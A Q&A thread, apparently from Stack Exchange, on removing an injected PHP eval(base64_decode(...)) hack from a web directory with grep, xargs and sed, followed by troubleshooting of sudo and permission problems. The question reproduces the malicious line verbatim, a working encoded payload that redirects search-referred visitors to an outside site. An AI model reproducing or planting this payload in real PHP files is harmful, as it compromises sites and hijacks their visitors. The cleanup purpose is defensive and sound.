# grep, xargs, sed to clean up PHP eval hack

Tags: grep, sed, xargs

I'm attempting to use the commands found on http://devilsworkshop.org/tutorial/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/55587/ to clean up a PHP eval based hack on a site.

Sample code to match/remove

```
<?php           eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9sb29wZG93bi5sZmxpbmt1cC5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9"));
```

Attempted command:

```
sudo grep -lr --include=*.php "eval(base64_decode" /home/user/webdir | sudo xargs sed -i.bak 's/<?php           eval(base64_decode[^;]*;/<?php\n/g'
```

The sudo has been added as it is required to have permission to read/write on the dir I'm accessing.  The files list properly from grep, but are not changed by sed.  Any suggestions?

Answer (score 2, accepted):

I think the double use of `sudo` is the culprit. I was able to get your commands to work fine without them.

Try `sudo -s` to open a new shell and then execute the piped commands on their own.

```
sudo -s
grep -lr --include=*.php "eval(base64_decode" /home/user/webdir | xargs sed -i.bak 's/&lt;?php           eval(base64_decode[^;]*;/&lt;?php\n/g'
```

Note: I did find your `\n` didn't come out quite right. Double backslash that and you should be OK.

Comment: I figured that might be the problem, however the solution unfortunately doesn't work.  sed: can't read /home/user/webdir/wp-content/themes/index.php: Permission denied

Comment: @roktechie: If you do (just) your `grep –l…` command (using `sudo` if necessary for read access), pick one of the files it lists, and then type `sudo sed –i.bak …` followed by that filename, what happens?

Comment: `sudo -s` should make you root on that system, so you can read/write what you want.  If root can't access something, `chmod` should get you out of it.  (If it's a RO filesystem, `cat /etc/fstab` should reveal that.)